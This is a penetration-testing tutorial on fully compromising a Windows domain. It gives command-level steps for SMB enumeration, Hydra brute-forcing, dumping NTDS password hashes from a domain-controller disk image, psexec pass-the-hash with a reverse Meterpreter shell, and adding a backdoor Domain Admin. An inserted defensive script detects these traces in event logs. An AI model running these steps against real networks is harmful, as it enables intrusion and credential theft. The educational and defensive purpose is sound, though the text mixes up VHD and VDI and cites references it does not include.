Grey Box Pentesting Scenario
1. What will you learn?
In this article you will learn how to fully compromise a domain environment without exploiting a single software vulnerability.
The article walks you in detail through how to:
- Use nmap scripts against the SMB service
- Use Hydra to brute-force an account over the SMB service
- Extract the ntds.dit from a VDI
- Use Metasploit with the pass-the-hash technique
- Perform post-exploitation in the enterprise environment
2. Identify the live hosts and the main services
The most important thing you must keep in mind in your penetration test is the scope. In our scenario the scope of the penetration test is 20 IP addresses in the IT department.
The IP range is 192.168.100.10-30.
Figure 1: Simple network diagram for the scenario
By reviewing the engagement rules it is easy to see that the IT admins have been placed in the same zone as the servers. This is a weakness in the network design: IT admins should not sit in the same zone as the core network servers. My recommendation is to put the IT admins in a separate zone with a tuned firewall between them and the servers, with rules based on the functions of the admins.
The other important thing in your penetration test is the methodology. Stick to your methodology and avoid skipping steps or jumping ahead. Following the methodology is also what lets you finish the project on time.
So we start our penetration testing project with one weakness already identified.
The username PENTEST was created with normal privileges to be used only for this activity.
One of the most powerful tools in the penetration testing process is nmap. In the following steps we will use nmap with its SMB scripts to collect information about this domain. Let's start by identifying the live hosts and the services running on them.
|#nmap -sP <Target-IPs>|
We will put the live hosts we find in the file Targets.txt.
Now we will run nmap with more options to identify the services running on these hosts and their versions.
|#nmap -sV -sC -iL Targets.txt|
From this output we can identify several pieces of information:
- These servers are running Windows Server 2008 R2 Enterprise (6.1)
- The domain name is pentest.corp.local
- The computer names are PCL-DC-01 and PCL-FTP-01
- There are some interesting services: DNS, SMB, LDAP and RPC over HTTP
3. Start by enumerating users through the SMB service
In this scenario we will focus on the SMB service, using a few nmap scripts to get more information.
We will use our user PENTEST to authenticate. We start by enumerating the domain users with the following script:
|#nmap --script smb-enum-users.nse --script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt|
From the output we can easily identify the users in this domain:
- Administrator, ftpuser, Guest, krbtgt, nuser, pentest
All of these accounts are enabled except Guest and krbtgt, so we save the other usernames in the file UserNames.txt.
Next we enumerate the shared folders in this domain with the following script:
|#nmap --script smb-enum-shares.nse --script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt|
So the shared folders on 192.168.100.10 are:
- ADMIN$, C$, IPC$, NETLOGON, SYSVOL
There are also shared folders on 192.168.100.11:
- ADMIN$, C$, IPC$
What we have found at this point is enough in our scenario to start working out how to capture the flag and gain full privileges on this domain.
4. After enumerating users, fire the brute force
In this section we will build a custom dictionary for a password attack based on the information we discovered about this domain.
I used some guessed words to seed the password file Pass.txt, then used John the Ripper to build my list Passwords.lst:
|#john --wordlist=Pass.txt --rules --stdout > Passwords.lst|
Then I use Hydra to start brute-forcing the accounts found during the enumeration phase over SMB:
|#hydra -L UserNames.txt -P Passwords.lst -M Targets.txt -t 96 smb|
I found another user, ftpuser with password ftpP@ssw0rd, that logs in successfully to 192.168.100.11. Try to connect to the server using Remote Desktop as ftpuser.
Figure 2: Use a Remote Desktop connection to connect to the FTP server
After successfully logging into 192.168.100.11 we start gathering all the information inside this server. After a while we found a VHD file, PCL-DC-01.VHD.
This file looked like a backup of the domain controller; that was my first thought when I saw it.
We will mount this share on our machine and then copy PCL-DC-01.VHD:
|# mount -t cifs '//192.168.100.11/C$' -o username=ftpuser,password=ftpP@ssw0rd /mnt/FTP/|
If you use Kali Linux you will need to install this package before running the mount command:
|#apt-get install cifs-utils|
Figure 3: Found the PCL-DC-01.VHD file
5. Mount the VHD file and get the NTDS, SYSTEM, SAM and Config files
If you want to mount a VirtualBox disk image (VDI) on Ubuntu 12.04/12.10, use vdfuse. This FUSE module uses the VirtualBox access library to open a VirtualBox-supported disk image file and mount it as a FUSE file system. The mount point contains a flat directory with the files EntireDisk, Partition1 ... PartitionN. These can then be loop-mounted to access the underlying file systems.
To install vdfuse on Kali Linux run the following command:
|# apt-get install virtualbox-fuse|
To mount the VDI file use the following instructions:
- Mount the VDI file on a mount point
- Navigate to the mount point; you will find EntireDisk, Partition1 and Partition2
- Mount Partition2 on another mount point
- Navigate to that mount point to find the C: partition
We will create a directory NTDS.
Now we copy the NTDS folder from the mounted VDI file PCL-DC-01.VDI, which contains the Active Directory database for the pentest.corp.local domain.
We will also need the SAM, SECURITY and SYSTEM files from the <mount-point>/windows/system32/config/ folder.
6. Dump the NTDS database and get the user hashes
First, download the libesedb libraries from 8.1.
Extract and compile the libesedb libraries using the following commands:
Second, download the NTDSXtract framework from 8.2.
This framework was developed to give the community a way to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).
The modules can extract information from NTDS.DIT files obtained from the following Windows versions:
- Windows Server 2003 (32 & 64 bit)
- Windows Server 2008 (32 & 64 bit)
The code is written in Python and tested on the following platforms:
The framework can extract information related to:
- user objects
- group objects
- computer objects
- deleted objects
b. NTDSXtract Modules
Currently the following modules are included in the NTDSXtract framework:
- dsfileinformation.py (time and date information related to the NTDS.DIT database file)
- dstimeline.py (timeline generation module)
- dsdeletedobjects.py (module that can extract information related to deleted objects)
- dsusers.py (extracts information related to user objects)
- dsgroups.py (extracts information related to group objects)
- dscomputers.py (extracts information related to computer objects)
You can find more information at 8.3.
c. esedbexport script
esedbexport is used to export the items stored in an Extensible Storage Engine (ESE) database (EDB) file.
After installing the libesedb libraries, extract the database tables from ntds.dit using the esedbexport script:
|# esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit extracted_ntds.dit|
d. Use NTDSXtract dsusers.py module:
Extract the hashes, user info and password history:
|# python dsusers.py /tmp/ntds.dit.export/datatable /tmp/ntds.dit.export/link_table --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > ntds.dit.output|
Note: the exported table names carry a numeric suffix (datatable.[number] and link_table.[number]); use the names shown in the esedbexport output.
Filter the hashes out of ntds.dit.output using the following command:
|# grep -A 1 "Password hashes:" ntds.dit.output | grep "^[[:blank:]]"|
e. Use the Metasploit ntds_hashextract.rb module:
Download the Metasploit module that extracts the usernames and hashes directly from datatable.3 from here: 8.4
|#/usr/share/metasploit-framework/tools/ntds_hashextract.rb /tmp/ntds.dit.export/datatable.3 <SYSTEM file>|
Now we are interested in the Administrator account. You have all the accounts with their hashes. You could try cracking those hashes, but it could take much longer than this process needs.
In the following section we will use the pass-the-hash technique to use those hashes without cracking the passwords.
7. Go to Metasploit and use psexec with the pass-the-hash technique
Warm up your hands as we get ready to capture the flag. Run Metasploit and use the psexec module as follows:
|msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.100.10
msf exploit(psexec) > set SMBDomain pentest.corp.local
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.100.102
msf exploit(psexec) > exploit
Congratulations: in figure 4 you can see that the pass-the-hash technique worked and we have a reverse Meterpreter session on the domain controller.
Figure 4: The Metasploit psexec module succeeded and we got a reverse Meterpreter session
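Both the Hydra run in section 4 and the psexec pass-the-hash step in section 7 leave distinctive traces in the Windows event logs of the targets (4625 failed logons from one source against many accounts; a 4624 NTLM network logon followed seconds later by a 7045 service install). The following detection logic is an added example, not part of the original article; the event records are constructed for the example and the field names are assumed simplifications of the real event data.

```python
from datetime import datetime, timedelta

def ts(s):
    return datetime.fromisoformat(s)

# Constructed sample events (not real log data). Field names are simplified
# versions of the Windows Security (4624/4625) and System (7045) event data.
EVENTS = [
    {"t": "2024-01-01T10:00:01", "id": 4625, "host": "PCL-FTP-01", "ip": "192.168.100.102", "user": "Administrator"},
    {"t": "2024-01-01T10:00:02", "id": 4625, "host": "PCL-FTP-01", "ip": "192.168.100.102", "user": "nuser"},
    {"t": "2024-01-01T10:00:03", "id": 4625, "host": "PCL-FTP-01", "ip": "192.168.100.102", "user": "pentest"},
    {"t": "2024-01-01T10:00:04", "id": 4624, "host": "PCL-FTP-01", "ip": "192.168.100.102", "user": "ftpuser", "logon_type": 3, "auth": "NTLM"},
    {"t": "2024-01-01T10:30:00", "id": 4624, "host": "PCL-DC-01", "ip": "192.168.100.102", "user": "Administrator", "logon_type": 3, "auth": "NTLM"},
    {"t": "2024-01-01T10:30:02", "id": 7045, "host": "PCL-DC-01", "user": "Administrator", "service": "MNbqWxYz"},
    {"t": "2024-01-01T11:00:00", "id": 4624, "host": "PCL-DC-01", "ip": "192.168.100.25", "user": "nuser", "logon_type": 10, "auth": "Kerberos"},
]

def detect_spray(events, min_accounts=3, window=timedelta(minutes=5)):
    """Flag a source IP whose failed logons (4625) hit at least min_accounts
    distinct accounts within `window`: the shape of hydra -L users -P passwords."""
    hits = {}
    fails = sorted((e for e in events if e["id"] == 4625), key=lambda e: e["t"])
    for i, e in enumerate(fails):
        start = ts(e["t"])
        users = {f["user"] for f in fails[i:]
                 if f["ip"] == e["ip"] and ts(f["t"]) - start <= window}
        if len(users) >= min_accounts:
            hits[e["ip"]] = max(users, hits.get(e["ip"], set()), key=len)
    return {ip: sorted(u) for ip, u in hits.items()}

def detect_psexec(events, gap=timedelta(seconds=60)):
    """Flag an NTLM network logon (4624, logon type 3) followed within `gap` by
    a service install (7045) on the same host under the same account: what the
    psexec module run with a passed hash leaves behind on the target."""
    by_t = sorted(events, key=lambda e: e["t"])
    logons = [e for e in by_t
              if e["id"] == 4624 and e.get("logon_type") == 3 and e.get("auth") == "NTLM"]
    alerts = []
    for svc in (e for e in by_t if e["id"] == 7045):
        for lg in logons:
            if (lg["host"], lg["user"]) == (svc["host"], svc["user"]) and \
               timedelta(0) <= ts(svc["t"]) - ts(lg["t"]) <= gap:
                alerts.append((svc["host"], svc["user"], lg["ip"], svc["service"]))
    return alerts

if __name__ == "__main__":
    print(detect_spray(EVENTS))
    print(detect_psexec(EVENTS))
```

The Kerberos RDP logon for nuser and the lone successful ftpuser logon are not flagged, which is the point: the alerts key on the burst of failures per source and on the logon-then-service pair, not on any single event.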
8. Post-exploitation: add a new user and make it a domain admin
Post-exploitation in penetration testing can use many different techniques to gather information about the network environment and can lead to further exploitation in the domain.
One of the most important steps after getting a Meterpreter session is to obtain SYSTEM privileges and migrate into a stable service process.
In this section I will show how to add a new account to the Domain Admins group to maintain your access to the pentest.corp.local domain.
In figure 5 you can see that I added a new user pentestAdmin to the domain. Then I list all the groups on this domain controller. Finally, I add pentestAdmin to Domain Admins to maintain my access to the domain pentest.corp.local.
Figure 5: Post-exploitation: add a user to the domain, then add that user to the Domain Admins group
All information in this article comes from a real penetration testing scenario. Some of the steps in the article are straightforward; you may need more skills to bypass restrictions such as antivirus, host intrusion prevention systems and firewalls.
Keep in mind that the most important part of penetration testing is the reconnaissance and mapping phase. The more information you gather during the activity, the higher the chance of capturing the flag and compromising the network.
11. About the author
Basem Helmy | ECSA/LPT
He is an information security engineer specializing in the offensive security track. He is a specialist in penetration testing of networks and web applications in highly secured environments, with more than 3 years of experience.